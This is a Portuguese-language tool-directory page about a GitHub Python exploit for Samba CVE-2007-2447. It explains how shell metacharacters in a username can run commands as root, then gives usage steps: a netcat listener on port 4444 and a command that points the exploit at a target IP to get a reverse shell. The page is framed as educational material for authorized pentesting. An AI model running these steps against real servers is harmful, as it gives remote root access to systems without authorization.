Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Samba-CVE-2007-2447-Exploit-Username-Map-Script — Exploit Samba CVE-2007-2447 | Kitploit
Ferramentas/GitHubGitHub/daviddoctor/samba-cve-2007-2447-exploit-username-map-script
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubdaviddoctor/samba-cve-2007-2447-exploit-username-map-script

Samba-CVE-2007-2447-Exploit-Username-Map-Script

Exploit Samba CVE-2007-2447

Ver Repositório
2há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Samba CVE-2007-2447 Exploit (Script de Mapeamento de Usuário)

Este repositório contém um script Python projetado para automatizar a exploração da vulnerabilidade CVE-2007-2447 em servidores Samba (versões 3.0.20 a 3.0.25rc3). Esta ferramenta foi desenvolvida exclusivamente para fins educacionais e para testes de penetração autorizados.

📝 Descrição Técnico-Acadêmica

A vulnerabilidade "Username Map Script" ocorre devido à falta de sanitização na entrada de nomes de usuário quando a opção username map script está habilitada na configuração do Samba. Ao enviar um nome de usuário que contém metacaracteres de shell (como backticks ` ou sub-shells $()), o servidor executa esses comandos com os privilégios do serviço (frequentemente root).

🚀 Requisitos

  • Sistema Operacional: Kali Linux / Parrot OS (ou qualquer Linux com smbclient instalado).
  • Linguagem: Python 3.x.
  • Dependências: smbclient (deve estar disponível no PATH do sistema).
  • 🛠️ Instalação e Uso

    1. Clonar o repositório:
      root@kitploit:~
      git clone [https://github.com/Daviddoctor/Samba-CVE-2007-2447-Exploit-Username-Map-Script-.git]
      cd samba-exploit-cve-2007-2447
      
    2. Dar permissões de execução chmod +x exploit.py
    3. Preparar o Listener (Kali Linux) nc -lvnp 4444
    4. Executar o exploit ./exploit.py <IP_OBJETIVO> <TU_IP_KALI> -p 4444
    Baixar ferramenta